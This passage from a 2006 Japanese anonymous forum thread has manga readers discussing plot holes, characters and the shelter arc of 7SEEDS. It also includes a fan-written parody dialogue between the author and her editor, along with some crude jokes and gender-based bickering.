「花は恋人が一緒だから大丈夫」とか「あなただって行けたのに」とか
のんきに話してるの見て、めちゃくちゃムカついた。
もっと美帆は手足飛散するほどむごたらしい死に方して
それを貴士が目のあたりにするぐらいの展開ほしかった。
あんな美しい死に方なまぬるすぎる。

669 :花と名無しさん:2006/11/29(水) 21:04:43 ID:???0
貴士がこの先、無残な死を迎えたとしても
花に希望を託して死んでいく事ができるんだよね。
「花、おまえの幸せだけを祈っているよ」とか。
救いようのない絶望感に苛まれながらというのはないんだ。

670 :花と名無しさん:2006/11/29(水) 21:07:40 ID:???0
あの夫婦って無自覚の残酷さがあるよな…
なんだかんだ言って自分達の思い通り、自分達は正しいんだ!みたいな
秋チームが見たらぶっ殺したくなりそうだ

671 :花と名無しさん:2006/11/29(水) 21:12:07 ID:???O
わからないよ。夏Aにしたことの罪の重さを自覚して同時に花と彼らが出
会ったら…と思い当たったら。ならないかもしれないが。

672 :花と名無しさん:2006/11/29(水) 21:12:56 ID:???0
いつまで続けるんだろう、この漫画('A`)

673 :花と名無しさん:2006/11/29(水) 21:21:43 ID:???0
>>670
そういう描き方じゃない。天国の扉とか言ってるし。
貴士は追いつめられた残酷さだし、妻はその先を行っている。
希望のない未来で、悟りを開かないとやってけないんだと思う。

674 :花と名無しさん:2006/11/29(水) 21:21:51 ID:???0
>>668
でも水死だからね・・・
少女マンガだからあんな安らかな笑顔を浮かべてたけど、
実際にあそこまで水が満ちた中で漂ってたら
すでに酸欠で顔が(ry で全身が(ry

675 :花と名無しさん:2006/11/29(水) 21:28:12 ID:???0
実際に自分が貴士の立場にいたとして。

シェルターの中で殺しあいをするか、シェルターの外でするか。
陰でするか、泥試合をするか、裁判で処刑するか。

生き残るメンバーを、公募するか、陰で決めるか。

精鋭を育てるとして、公募するか、秘密裏に進めるか。

落ちこぼれたメンバーを金かけて養うか、さっさと抹殺するか。

きれいごと言ってられない気分になってくるんだけど。
てか、そんな役は降りたい。人に任せたい。

進んで引き受けるか、しかたなくやるか、やらないか。
やらなくても抹殺されそうだ。

676 :花と名無しさん:2006/11/29(水) 21:48:36 ID:???0
貴士は美帆が綺麗じゃなくなってくのを目の前で見たんじゃないか?
個人的にはあれでよかったと思うな
目の前で死んでく美帆を助けられなくて貴士はさぞかし無念だろう
夏Aを同じ目にあわせたんだと気付いてくれないかな

677 :花と名無しさん:2006/11/29(水) 22:07:00 ID:???0
まあ貴士夫婦の運命は妥当な運命だな。
自分の娘を反則に近い形で望み通り未来に行かせられたんだし
この上最期まで二人一緒で幸せに…だと理不尽極まりない、周りの人達が。
勝手に選ばれて嘆いてる人達は既に同じ苦しみをしたわけだし。

678 :花と名無しさん:2006/11/29(水) 23:13:22 ID:???O
貴士は嵐のこと軟弱だって言ってたけど、花を守って傷害事件を起こしたことは知らないのかね?

679 :花と名無しさん:2006/11/29(水) 23:26:00 ID:???0
貴士の事だから、俺だったら表沙汰にならないように上手く処理出来たとか思って…

680 :花と名無しさん:2006/11/30(木) 01:02:22 ID:???0
っていうか、嵐って貴士先生が殺そうと思えば、殺せるよね。

681 :花と名無しさん:2006/11/30(木) 01:11:40 ID:???0
貴士、やつれ顔がかっこいいです

682 :花と名無しさん:2006/11/30(木) 01:56:31 ID:???0
貴士に比べれば、ほとんどの男が軟弱だよな
嵐カワイソス

683 :花と名無しさん:2006/11/30(木) 02:22:23 ID:???0
まあ夏Aのエリートっぷりを見た後じゃ、
日本の高校生なんか軟弱以外の何者でもないよなw

684 :花と名無しさん:2006/11/30(木) 02:38:57 ID:???O
やっぱり貴士は夏Aの最終テスト遂行の実績を買われて責任者になってるのかね。
それじゃもう業が深すぎて改心は無理っぽい気もしてきた(´・ω・)

685 :花と名無しさん:2006/11/30(木) 02:40:13 ID:???O
スマソです!いつものブログにバレがウプされてないわけだが・・・
どこに行けばバレ見れますか?

686 :花と名無しさん:2006/11/30(木) 03:26:13 ID:???0
>>685
本屋

687 :花と名無しさん:2006/11/30(木) 06:55:57 ID:???0
ブログの中の人は現在ネット繋いでないって本家の方に書いてあった

688 :花と名無しさん:2006/11/30(木) 07:40:47 ID:???O
>>685
今月号はタム先生の二本立てだから買って損はないぞ
7種は勿論の事、新連載の方も面白かった

689 :花と名無しさん:2006/11/30(木) 08:00:14 ID:???0
子供をかばって傷ついた貴士が、滅び行くシェルターを眺めながら、

「美帆… ぼ く が 間 違 っ て い た よ」

なんて言ったら、59849顔無しミラクル

690 :花と名無しさん:2006/11/30(木) 10:27:17 ID:???0
>>675
たぶんこれから茨木マークがスタッフ側として
何も知らない人々に「嘘をつかなければならない」立場になって
その苦しみを嫌というほど見せてくれそうな気がする。
これから殺される人たちを、笑顔で連れて行くとか…。

691 :花と名無しさん:2006/11/30(木) 11:32:23 ID:???0
先生方(政治家の人たち)は、何やってんだろ。
「君にまかせるよ」って、なんか、ちょっと、ムカつく。

692 :花と名無しさん:2006/11/30(木) 12:27:22 ID:???0
センセイ方ってのはそーいうもんだ

693 :花と名無しさん:2006/11/30(木) 13:26:09 ID:???O
>>688 とらじは前にも付録であったよ。
何作載ったか忘れたけど。

694 :花と名無しさん:2006/11/30(木) 13:35:43 ID:???O
ネオ東京とか龍馬村とか、竜宮以外にも日本各地にシェルターがあるって言ってたけど、あれホントにあるのかな?
そんな大規模なシェルターをいくつもいくつも作れるもんなのか?
あの交信の映像は、竜宮の人達を安心させるために事前に撮った映像なんじゃ・・

みたいに思った。

あっ、でも野球したとか言ってたか・・

695 :花と名無しさん:2006/11/30(木) 14:41:31 ID:???0
ν速のおもしろ漫画スレで紹介されていたので、大人買いした。
突っ込みたくなる所は多いけど、おもしろいね。


696 :花と名無しさん:2006/11/30(木) 15:23:08 ID:???0
>>694
アレはクスリ射たれて見せられた幻覚
野球なんてできるわけがない
場所、グラウンドの整備、電光掲示板のメンテナンス、ユニフォームの製作・及び修復etc
野球の試合一つとってもそれくらいの労力と金が必要になる
たかだか娯楽なのにそこまでかける必要性がない


697 :花と名無しさん:2006/11/30(木) 15:58:07 ID:???0
>>695 へえ、他の板でも紹介されてたんだ。
今から一気読みできる人がうらやましいな。

>>694 シェルター自体はあると思う。というか、あってほしい。
富士以外にも、各地に地下道とか設備とか使えるものがあるなら、種が生きてくのが少し楽になる。
……今回みたく、中身がきついことになってるかもだけどなー。

698 :花と名無しさん:2006/11/30(木) 16:33:05 ID:???0
>>696
だよな。野球なんて出来るわけがない
作者が野球について何も知らないのが丸分かり
たぶんインフィールドフライもフィルダースチョイスも知らないんだろうな

699 :花と名無しさん:2006/11/30(木) 16:36:06 ID:???0
インフィールドフライもフィルダースチョイスも知らないし、ググル肝無いが
草野球みたいな運営ならシェルターでも維持できるんじゃね?

700 :花と名無しさん:2006/11/30(木) 16:39:28 ID:???O
できるわけないと言い切っちゃうのも何だかな。
でも、正直野球みたいな広さ高さを必要とするスポーツは無理だろうと思う。
バスケとかの方がああいう空間には向いてるかも?

701 :花と名無しさん:2006/11/30(木) 16:41:04 ID:wXzI6I8K0
歌手一人、芸人一人、DJ一人
野球最低18人

どう考えても変でしょ

702 :花と名無しさん:2006/11/30(木) 16:42:26 ID:???0
だがバスケじゃ日本人の心の支えにはならんw
やっぱそこは野球でしょ。

703 :花と名無しさん:2006/11/30(木) 16:44:06 ID:???0
>>701 上段は龍宮内での人数。
下段は全国のシェルターから集める最低人数。
規模が違うじゃん。

704 :花と名無しさん:2006/11/30(木) 16:57:41 ID:???O
関東や東北、北海道と地下鉄で通じているというのはな…
技術的にも、予算的にも
またグチャグチャになっているに違いない地盤から考えても
明らかに不可能なことだと思う。
恐らくそれぞれのシェルターは完全孤立無縁状態で
人々の不安を取り除くために、予めニュースなどの映像を作って用意していたという説に一票だ。
スタッフの最大の条件「嘘をつく」というのは、そういうことじゃないかな。

705 :花と名無しさん:2006/11/30(木) 20:14:22 ID:???0
確かに地下鉄はなあ・・・
いくら各ドームで中継してるとはいえ、北海道から九州四国まで繋がってるってw
別に地盤に異常がなくてもありえねー。100年かかっても掘れないだろ。
それに実際に選手と会った人っていないんでしょ?
やっぱ捏造映像か。いや、それも無理があるな・・・整形した素人に野球させても
絶対にバレるし、選手も球場も全部CGでしたってのもなあ。
結局わからん。

706 :花と名無しさん:2006/11/30(木) 20:27:25 ID:???0
火野タケルが実際にいるのは確実じゃないか。
試合に筋書きがあるんじゃないかなー。
で、各地の選手がそのように演技して合成する。
あるいは、アーカイブから顔だけ差し替えとか…。
無理かなあ。

707 :花と名無しさん:2006/11/30(木) 20:50:22 ID:???O
先月今月とシェルター描写が始まってから、疑問や設定の粗が一気に目立つようになってきたね。
個人的には十分面白いので、疑問はあっても不満はないけどね。
ところで、気になるのが美帆さんのポジション。
てっきり貴士要の同級生とかくらいの設定の一般人かと思っていたら、美帆自身も計画に関わってるっぽくて意外だった。
あと、美帆の胸元の十字架のペンダントも気になる。
単にクリスチャンだったり好みのアクセサリーというだけかもしれないけど、
同じようなのを涼もしてたし、何かの伏線ということはないだろうか…と。
まあ、有り得ないだろうけど。

708 :花と名無しさん:2006/11/30(木) 21:22:00 ID:???0
ワイルドコムの超能力四コマにも火野タケルっていなかった?

709 :花と名無しさん:2006/11/30(木) 23:16:28 ID:???0
いたー

7SEEDSで他の漫画のキャラクターが出てくるのって、
Dr.サンダース以来だね。たぶん。

710 :花と名無しさん:2006/11/30(木) 23:32:57 ID:???O
見回りじゃなくて常時警備に見張らせとけなかったのかね。それか監視カメラ。
なんか抜けてるよな。そんなので次回またジェノサイドな展開だったら正直うんざりだわ〜。

711 :花と名無しさん:2006/11/30(木) 23:39:02 ID:???0
うんざりしたら読むのやめたらいいと思うお( ^ω^)

712 :花と名無しさん:2006/12/01(金) 00:02:33 ID:???O
そうなると決まったわけじゃないけどね。大儀の為に権力者による無辜の民の大虐殺、
な展開の連続にうんざりしない人が果たしてどれだけいるのやら(;^ω^)。

713 :花と名無しさん:2006/12/01(金) 00:15:47 ID:???0
>>703
わたしもウンザリしそうなヨカンあるよ。
そろそろ、希望のある話に進んで欲しい。

714 :花と名無しさん:2006/12/01(金) 00:25:35 ID:???0
大量冬眠もありではないかと。
選ばれたチームが安定した生活ができるようになったら、
うまく解凍できるかわからんが、起こしてやってくれyoな人々

715 :花と名無しさん:2006/12/01(金) 00:27:58 ID:???O
タイミングが悪いのかもね。
まだ夏A編が終わってまもなくて、秋チームとの話も始まったばかりの時に
また大量死(虐殺?)の展開になってくると、ちょっとキツイ。
まあ、同じ人間が計画して責任者的立場にいるんだから、
殺伐とした展開が続いても何の不思議もないんだけどさ。
個人的には、一旦花VS秋のエピソードを終わらせて、
夏Bも久々に出てきた後で見たかったかも>シェルター話
もうちょい時間空けてほしかった。

716 :花と名無しさん:2006/12/01(金) 00:48:54 ID:???O
貴士がきぐるみ着てキャラに合わないキャラ演じて見回りしてるのにちょっとじーんときた。
そしてやっぱミホは花のお母さんだなって感じの最期に本屋で一人で泣きそうになった(ノд;)

717 :花と名無しさん:2006/12/01(金) 01:17:17 ID:???O
順番的には秋チームも真実を知ることになるんだろうし、それに後の展開の為に今
やらなければならないエピなのかもしれないね。後にならなければわからないけど。
しかし作品内の時期的に暗転するのが早すぎる気がする。何ヵ月も経ってないみた
いだよね。警備の手薄さも不自然だから、無理矢理に殺伐展開させてるように見え
ちゃうなあ。

718 :花と名無しさん:2006/12/01(金) 01:32:18 ID:???0
うーん、急展開だな、とは私も思ったけど、
でも、「早く他のチームの話を」っていう人がいるのを考慮した、ギリギリのところだとは、思う。


なんか、インタビューでも、冬のチームの話も、
ほんとは、本誌ではなく、他の雑誌で同時進行で書こうと思っていた、
って言ってらしたし、いろいろと、難しいのかも。

719 :花と名無しさん:2006/12/01(金) 02:08:00 ID:???0
とにかくしっかりと書いて欲しい
キャラの心情やパニックの恐ろしさを描きたいなら、話に説得力のある設定をして欲しい
粗や穴だらけで話に納得感が全くない。
反論が「じゃあ読まなければ?」っていうだけなのは惨めすぎる
もっとしっかりと描いて欲しい

720 :花と名無しさん:2006/12/01(金) 02:50:54 ID:???0
粗だの穴だのと決めるのはどうよ。
後の展開によっては、それは「設定」といえるんだし。
警備の手薄の前に、3年で帰れる可能性がどの程度のものなのか、気になる。
貴士が美帆と一緒に死にたがってたけど、それは最初から自然死の可能性がないってことじゃ?
物語的には今の話は必要なタイミングだと思うな。
秋のトラブルを今回の話なしで花たちに解決されても納得いかない。
今回の話を3人が読んでて、蘭たちも中を見てるってとこに意味があると思う。
花には対夏Aの前振りにもなりそうだ。

721 :花と名無しさん:2006/12/01(金) 02:54:16 ID:???O
あんごきゅん(*´Д`)ハァハァ

722 :花と名無しさん:2006/12/01(金) 03:14:43 ID:???0
あの政治家たちの中に、ちさちゃんの親族はいらっしゃるのかな。

723 :花と名無しさん:2006/12/01(金) 08:28:58 ID:???O
食べるのかな。半分移動の人たちを。
百舌が、
「食べ物がある間は共食いしない」
って言ってたよね。

724 :花と名無しさん:2006/12/01(金) 08:38:33 ID:???0
>>719
>反論が「じゃあ読まなければ?」っていうだけなのは惨めすぎる

だよねえ
グゥの音も出ないもんね

725 :花と名無しさん:2006/12/01(金) 09:04:07 ID:???0
話変わるが、パナ・ソニーで吹きだしてしまってせっかくのシーンが台無しになってしまった

しかしよくよく考えてみたらなんでパナ・ソニーで吹いたんだろう。
パナソニックと間違えたのだろうか。

726 :花と名無しさん:2006/12/01(金) 09:12:44 ID:???0
>>723
食料や資源としてリサイクルでしょうな

727 :今月号の楽屋裏@:2006/12/01(金) 09:25:33 ID:???0
編集「先生、貴士の話をまだ続けるんですか?でも、やっぱりあれだけのことを
   しただけあって、貴士への読者の評判は最悪なんですよねえ」
田村「そうですか…私は気に入ってるんですけど。『踊る教室』のテロリストみたく
   信念のためらな人殺しも辞さないって悪役は好きなんです私」
編集「(やっぱちょっとアブネーなこの人…)」
田村「…わかりました、なんとか貴士の人気が出るようにしましょう」
編集「えっ?そんな方法があるんですか?(あんな悪人をどうやって…)」
田村「まずヒゲを剃らせ若返らせます。そしてシェルター内では着ぐるみを被らせて、
   お茶目な所もあるんだよとアピールします」
編集「き、着ぐるみっすか!?」
田村卯「さらに奥さんとラブラブ夫婦な所を描きます。これがこれまでの
    イメージとギャップをつくって、効果があるんです」
編集「なるほど!不良が猫を助けるのを目撃して惚れるパターンの発展形ですね」
田村「それだけじゃ弱いから、朱理みたく無能者を嫌う発言をさせます。
   これが結構、女の子のハートを奪っちゃうんです」
編集「小生意気なクールガイに『フン!』『阿呆!』って言われたい心理ですね」
田村「トドメは目の前で奥さんを死なせます。普段は強いのに、最愛の者を失い
   打ちひしがれる男…女の子はこういうのに弱いんですよ、うふふ…」
編集「はあ…なんとなく分かりますが、でも、そううまく行きますかねえ?」

728 :花と名無しさん:2006/12/01(金) 09:26:43 ID:???0
>>725
パナソニック&ソニー?

729 :今月号の楽屋裏A:2006/12/01(金) 09:31:34 ID:???0
〜今月号発売後〜

編集「先生!驚きました!ファンレターもメールも、貴士に好意的なものばかりですよ!
   ”貴士って意外と可愛いとこあるんですね♪” ”美帆さんとのらぶらぶ夫婦
   ぶりはほのぼのしましたっ☆” ”悪い人だけど奥さんがあんなことになって
   可哀想です…(涙)”……エトセトラエトセトラ」
田村「ほ〜らごらんなさい。読者なんて単純なものでしょ?ちょっとしたキュンとくる
   ツボを突けば、キャラの印象操作なんて簡単なのよ。例えどんな悪者でもね〜」
編集「さすが先生!伊達に少女相手に20年もご飯を食べてらっしゃらない!スゴイです!」
田村「キミはまだ新人編集だからわからないかもしれないけど、今でも生き残ってる
   私たちベテランは、新人の頃にこの読者を操るツボのイロハを叩き込まれたものよ」
編集「なるほど!さっそく僕も担当してる新人たちを、そのように教育します!
   …ところで先生、ファンレターや編集部へのメールはともかく、2chねるでは
   相変わらず貴士のイメージは改善してないようですねえ。若干、好意的な
   書き込みが増えたくらいです」
田村「仕方ないわよ。あそこはツボが効かない、スレきったマンガジャンキーばかり
   なんだから。でも連中みたいなタイプ、所詮少数派だから無視無視♪」
編集「そうですよね!では次は要のイメージアップもお願いしますよ!」

730 :花と名無しさん:2006/12/01(金) 09:35:50 ID:???0
読者の心をつかむならば桃太郎に猫耳つければおk

731 :花と名無しさん:2006/12/01(金) 09:56:47 ID:???O
なんか久し振りだなあんたw

それはさておき、夏Aのときの貴士は悪役とみていいもんだと思ってたが違うのか?

732 :花と名無しさん:2006/12/01(金) 12:30:32 ID:???O
個人的にがっかりしたのは貴士が夏Aへの罪悪感に苦悩した上で計画に参加している、というキャ
ラじゃなかったこと。花と嵐が単純に、子供かわいさにコネで7SEEDS計画に選ばれたってことだな。
(鷹の故意に選んで〜は結局これだけの意味だったのか?)

733 :花と名無しさん:2006/12/01(金) 18:08:53 ID:???0
>田村「キミはまだ新人編集だからわからないかもしれないけど、今でも生き残ってる
>   私たちベテランは、新人の頃にこの読者を操るツボのイロハを叩き込まれたものよ」
>編集「なるほど!さっそく僕も担当してる新人たちを、そのように教育します!

貴士のことはともかく、ここだけは真実突いてる気ガス

734 :花と名無しさん:2006/12/01(金) 21:19:08 ID:???O
今月号読んだ
連載も読み切りもお父さんの話だね
狙ったのかな

735 :花と名無しさん:2006/12/01(金) 22:55:01 ID:???O
>>720
警備へのツッコミはやめられないが、私も3年っていうのは人がぎりぎり
我慢できそうな期間、ということで絶望させないための嘘だと思う。
本当はどれくらいだったのかわかる時は来るのかな。

736 :花と名無しさん:2006/12/01(金) 23:04:44 ID:???0
細かいところへのツッコミだけど……
非喫煙者ばかりが集められていたという話だったが、陰で喫煙していた人達はどこから
タバコを手に入れたのだろうか? 非喫煙者が選ばれていたなら、シェルターにもタバコ
は置いてないと思うのだが。


737 :花と名無しさん:2006/12/01(金) 23:10:26 ID:???0
喫煙者を入れるのは反対だったと言っていたくらいだから
非喫煙者ばかり集めたわけじゃないような・・・

738 :花と名無しさん:2006/12/02(土) 00:20:41 ID:???0
そうか。読み飛ばしてたみたいだな。すまん。

739 :花と名無しさん:2006/12/02(土) 02:01:41 ID:???0
ここの住人といっても一部なんだろうが
貴士バッシングの人、ほんとに視野が狭いというか
坊主憎けりゃ袈裟まで憎いというかw

このスレも質が落ちたなあと最近思わずにいられない

740 :花と名無しさん:2006/12/02(土) 02:57:23 ID:???0
>>739
貴士叩いてるのは女だろ
女っつうのはちょっと正義感をふりかざして悪い奴を叩いて正義のヒロインぶったり
ちょっと難しそうな題材の少女マンガ読んで、世の中の事を知った気になっちゃう生き物だからな
今回も貴士たたいて正義のヒロイン気取ってるんじゃないの?
ま、自己陶酔しちゃってるのさ

741 :花と名無しさん:2006/12/02(土) 04:14:27 ID:???O
>>723 >>726
考えただけでガクブル

742 :花と名無しさん:2006/12/02(土) 05:57:01 ID:???O
>>739>>740
よかった。貴士バッシングに批判的な人もいて。
貴士バッシング擁護派ばっかりでついに田村ファンのレベルが地に墜ちたのかと思った。
女は感情でモノを言うから、夏Aがああなった以上、誰かを悪者にしたてあげないと気が済まないんだろうね。私も女だけど。
もうちょっと広い目で、誰かに特別に感情移入しないでみれないかな。
じゃなかったらいちいち不愉快なこと書き込まないでほしい。
そうしたら私もこんな不愉快なこと書き込まないで済むし。

743 :花と名無しさん:2006/12/02(土) 06:33:33 ID:???O
性主張倫理キモス
貴死なんかどうでもいい

744 :花と名無しさん:2006/12/02(土) 07:23:42 ID:???0
俺は貴士バッシングしてるけど男だ。
夏Aが可哀想だからじゃなくて、「もっと広い視点で読め」なんて
偉そうに言ってる擁護派が気に食わないからだけど。
でも俺も男だから、そういう読み方する気持ちわかるw。キャラにやたら入れ込む女を
嫌悪する気持ちも。
でも本音は「これだから女はバカなんだよ」って言いたいだけなのに、
そこまで直球だと叩かれるから「広い視点で読め」なんて言ってるだけだと
思うがね。

745 :花と名無しさん:2006/12/02(土) 07:40:54 ID:???0
つか、貴士バッシングの流れでもないのに唐突だな>>739は。
そのたとえだと坊主は貴士なんだが、わかってるんだろうな。

746 :花と名無しさん:2006/12/02(土) 08:32:38 ID:???O
何この流れ。
女は男は…って、そんな発言する方がスレの質下げてるだろうが。
貴士が憎いだの擁護派だのって、花派ナツ派のバトルと同じくらいどうでもいい。
キャラに感情移入して読むのも至極普通だと思うけどな。
編集や審査員じゃないんだから、何も冷静な視点で淡々と読むのばかりが良い訳でもないだろう。

747 :花と名無しさん:2006/12/02(土) 10:01:33 ID:???0
貴士バッシング否定派も感情移入してるから否定してるんじゃないの?w
何にも思ってなければ「ふーん、そんな意見もあるんだ」くらいにしか思わない。

748 :花と名無しさん:2006/12/02(土) 10:05:31 ID:???O
荒れるのは桃太郎がでないせいだ。
早くでろーい

749 :花と名無しさん:2006/12/02(土) 10:25:31 ID:???O
好きなキャラ叩かれるのいやなら2ちゃんなんかみるなよ(笑)

匿名に隠れて、人の気持ちなんか考えられない
おこちゃまばっかりなんだから。

ミクシのコミュのがむいてるんじゃね?

750 :花と名無しさん:2006/12/02(土) 12:24:03 ID:???0
どーにも今回の話は危機の演出が安易だなーと思う。
もっとこう、徹底した隠蔽にも関わらず蔓延する自殺だとか、時を経るに従って増え続ける暴力沙汰のトラブルだとか、
アルコールの配給をめぐってのいさかいだとか、処方の激増で底をつく抗鬱剤だとか、無気力の広まりで困難になる
都市機能の維持だとか、そういうのを描いて欲しかった。

751 :花と名無しさん:2006/12/02(土) 12:32:32 ID:???0
あー、はいはい、わかる気がする>>750
馬鹿のせいでおじゃんだ!って話じゃなくて
抗えない流れでじりじり滅亡に向かうって話、自分も読みたかった

752 :花と名無しさん:2006/12/02(土) 12:41:30 ID:???O
>>750
そこまでは考えてなかったけど、私もそういう一部の連中じゃなく全体の精神的疲弊から
崩壊していく感じのほうが良かった。駆け足でいいから、3年経過させて、その上で民間
から警備を募集、中に外へ出ようとする者が紛れ込み手引き、今回の話へ…なら自然に見
えたかも。

753 :花と名無しさん:2006/12/02(土) 13:21:00 ID:???0
>>750
尺の都合もあるんだろうけどね。
今回の馬鹿どもも、地下の閉塞感から逃れたくて愚行に走ったというのはわかるんだが、
やっぱり事が起こるのは2年後くらいにして欲しかった。

が、「花が日記を読んでいる」という設定上、
ずっと平和な日々が続いてばかりだと描写が難しいので
さっさと事件を起こさせたのかもしれん。

754 :花と名無しさん:2006/12/02(土) 15:11:41 ID:???0
>>750
時々貴士視点が入るけど、これは日記には当然入ってない部分だよね。
基本の日記を書いてるマークは、そういう運営上の細かいことを知ってたり、知らされてたりしたとは考えにくい。
仕事は芸人なんだし。

755 :花と名無しさん:2006/12/02(土) 15:18:51 ID:???0
実は貴士とマークの交換日記だった。
妻を失った貴士はマークに癒しを求め、そして二人は・・・・・・

756 :花と名無しさん:2006/12/02(土) 15:32:34 ID:???0
>>755
違う!3人だよ
人形プレイ

757 :花と名無しさん:2006/12/02(土) 15:46:32 ID:???0
>>750
私もそういうの希望!
でも、今回の章が長くなればなるほど、
他チームマンセーな人達がうるさくなるんじゃない?

758 :花と名無しさん:2006/12/02(土) 16:22:17 ID:???0
>>755>>756
おまいら・・・w

759 :花と名無しさん:2006/12/02(土) 17:22:25 ID:???0
>>729にワロス

田村さんは読者にそういう印象操作するタイプじゃないよ
風の作者●と混同すんなw

760 :花と名無しさん:2006/12/02(土) 19:21:39 ID:???0
>>729
まあ、妄想はそのくらいでやめてくれると嬉しい


761 :花と名無しさん:2006/12/02(土) 20:29:04 ID:???0
しかし、あの穴掘り連中むかつくよね・・・
最初は不穏な雰囲気あったから貴史の奥さんが
集団で暴行されるんじゃないかと思ってたけど
もっとひどいことを影でやってたんだね

762 :花と名無しさん:2006/12/02(土) 21:04:05 ID:???O
蝶子ちゃんマジ可愛い

763 :花と名無しさん:2006/12/02(土) 22:55:01 ID:???O
穴掘りより計画者のツメの甘さの方がムカつく。あれだけいれば想定内だろ。
Xデーまで何年準備期間があったんだい。

764 :花と名無しさん:2006/12/03(日) 00:45:06 ID:???0
>>750 みたいな感じでいってほしかった。

掘る道具どこで調達したんだよぉ〜道具置き場のセキュリティは?
見張りいなかったの?て感じがして「?」な部分が多くてなぁ。
もそっと納得できる展開がほしかった。

765 :花と名無しさん:2006/12/03(日) 00:53:39 ID:???0
貴士はハンサムなんで好きです。

766 :花と名無しさん:2006/12/03(日) 01:07:12 ID:???O
彼の腹黒いとこが好き、という人がいても驚かないよ。

うーむ、10巻は6巻に次いでツッコミどころの多い巻になりそうね。
一気読みで印象が変わるといいんだけど。

767 :花と名無しさん:2006/12/03(日) 10:01:59 ID:???0
ていうか穴掘り連中は、あそこが海の中って知ってたんだよね?
穴なんかあけちゃったらどうなるかなんてサルでも分かると思うんだけどなぁ

768 :花と名無しさん:2006/12/03(日) 10:08:41 ID:???O
そういえば、何故海の中なのに穴掘り…

769 :花と名無しさん:2006/12/03(日) 10:46:07 ID:???0
閉塞感で息が詰まって、自暴自棄になっちゃってたのかねぇ

770 :花と名無しさん:2006/12/03(日) 13:34:04 ID:???0
もう実際の未来のナツ達を描くにはネタ・想像力切れか?


771 :花と名無しさん:2006/12/03(日) 16:29:26 ID:???O
結局サバイバルそのものよりは人同士のぶつかり合い、ドロドロを描きたい人のようだね。
ナツと蝉も馴れ合いぽくなってるし、ナツの憧れの人、嵐への失望なんて間違っても描きたくなさ
そうだからなかなか思いつかないんじゃないの。

772 :花と名無しさん:2006/12/03(日) 18:03:43 ID:???0
嵐には辛うじてキレイなうちに死んでもらいましょう

773 :花と名無しさん:2006/12/03(日) 18:09:51 ID:???O
狂っちゃう人間がいないのは驚き


774 :花と名無しさん:2006/12/03(日) 20:00:13 ID:???0
すぐ狂っちゃうような人は除外されてるんでねえか

775 :花と名無しさん:2006/12/03(日) 21:03:48 ID:???0
夏Aはある意味全員狂ってるだろ

776 :花と名無しさん:2006/12/03(日) 21:11:59 ID:???O
夏Bと春以外はちょっと精神の何かがぷつって切れちゃってると思う

777 :花と名無しさん:2006/12/03(日) 22:05:20 ID:???O
夏Bと春はまだ狂うほどひどい目に会ったことないから。

778 :花と名無しさん:2006/12/04(月) 00:33:39 ID:???0
冬の人も加えてくださいな・・・

779 :花と名無しさん:2006/12/04(月) 00:42:22 ID:???0
秋は狂ってると思うけど。

780 :花と名無しさん:2006/12/04(月) 00:59:33 ID:???O
冬の人もある意味何かを超越しちゃってるよ…
十数年一人で…
何もないに等しい場所で…
わんことだけ一緒…

781 :花と名無しさん:2006/12/04(月) 02:10:28 ID:???O
わんこ!
冬の話からまさか新巻が一人で10数年も生きてたなんてびっくりした。

782 :花と名無しさん:2006/12/04(月) 04:28:44 ID:???O
荒巻すごいな。
しかし犬や虎は生き残っていて、人類が絶滅という不思議。
よっぽどしぶとい種族の筈なのに。

783 :花と名無しさん:2006/12/04(月) 09:03:04 ID:???0
>>782
人は生肉とか生水とか飲食してたら間違いなく病気になるからね
動物はそこらの生き物食べたり川の水そのまま飲んでも耐性あるし
災害とかあったらまず人間が全ての動物の中で一番先に大幅に減るよ

784 :花と名無しさん:2006/12/04(月) 10:34:02 ID:???0
大阪人なんかをシェルターに入れるからあんな事に・・・(´;ω;`)ウッ…

785 :花と名無しさん:2006/12/04(月) 15:23:20 ID:???0
最近一気読みしたよ…

冬チーム…
15年て…
犬がいるじゃんって…

泣きそうになった

786 :花と名無しさん:2006/12/04(月) 16:21:13 ID:???O
ナツや花たちに会って やっと人に会えてよかった…涙 どころじゃないよね…
訓練を受けた夏Aは実戦はしてないわけで…
訓練無しに15年の鷹。
ある意味最強キャラですな…

787 :花と名無しさん:2006/12/04(月) 20:42:13 ID:???0
でも何で言葉がスラスラ出てくるんだろうか
15年間居ぬ以外と会話〇だろ?よく日本語忘れなかったな


788 :花と名無しさん:2006/12/04(月) 20:47:15 ID:???0
>>787
犬に話しかけてたんだよ。

789 :花と名無しさん:2006/12/04(月) 21:04:41 ID:???0
下品ですまんけど、犬が盛って繁殖したりするの見て
悲しくならなかったのかな。

790 :花と名無しさん:2006/12/04(月) 21:14:15 ID:???0
>>789
大丈夫、極限状態の男は動物相手でも用を足せるから。

791 :花と名無しさん:2006/12/04(月) 21:16:20 ID:???O
鷹タン…

792 :花と名無しさん:2006/12/04(月) 22:18:03 ID:???O
15年間、洗濯と下着とかの衣類どうしてたんだろうと…


ギャートルズみたいなカッコにならなかった
のは少女漫画だからだと思ってた

793 :花と名無しさん:2006/12/04(月) 22:32:29 ID:???0
ギャートルズならまだギャグになるけど、真面目に考えたら浮浪者以下の格好のはずだわな。

794 :花と名無しさん:2006/12/04(月) 22:38:04 ID:???O
犬に話しかけるったって、内容が人間に話すよりは限りがあるよね。
ガン告知がどうとか、よく淀みなくしゃべれるなーと思ってしまう。

795 :花と名無しさん:2006/12/04(月) 23:31:49 ID:???O
あのジーパン?15年もったんだな

796 :花と名無しさん:2006/12/05(火) 00:36:25 ID:???O
さすがに服は…体も成長するし…
もしかしたら富士の貯蔵庫に衣服もあったかもよ(・ω・)b
皆臭いとかどうしてたんだろう。
さすがに貯蔵庫にデオドラントはないか…w

797 :花と名無しさん:2006/12/05(火) 01:17:36 ID:???0
>>皆臭いとかどうしてたんだろう

皆が臭ければ臭くないかもwその中に突然投入されたら
即死臭であっても(・ω・)

しかし、Aのチームとの最初の遭遇はどのチームになるんか
ドキドキしてます。

798 :花と名無しさん:2006/12/05(火) 01:23:46 ID:???O
>>797
Bだと思うな。
そうじゃなきゃ、温存されてるって思わなきゃ悲しい…

799 :花と名無しさん:2006/12/05(火) 01:36:04 ID:???0
>>797
「生きてこそ」の原作でそんな話があったな。
飛行機事故で、雪の山頂に墜落して生き延びた人たちの話。
72日後にようやく救助が来たんだけど、一度に全員は運べないので、
一度、ヘリは帰って翌朝来るこに。でも、残される生存者たちが
不安がる(もうヘリが二度と来ないんじゃないかとか)ので、
ヘリに乗ってた救助者が一人降りて、生存者達と一晩過ごすの。

その時に、救助者はあまりに臭いが凄くて気が遠くなりそうだったのに、
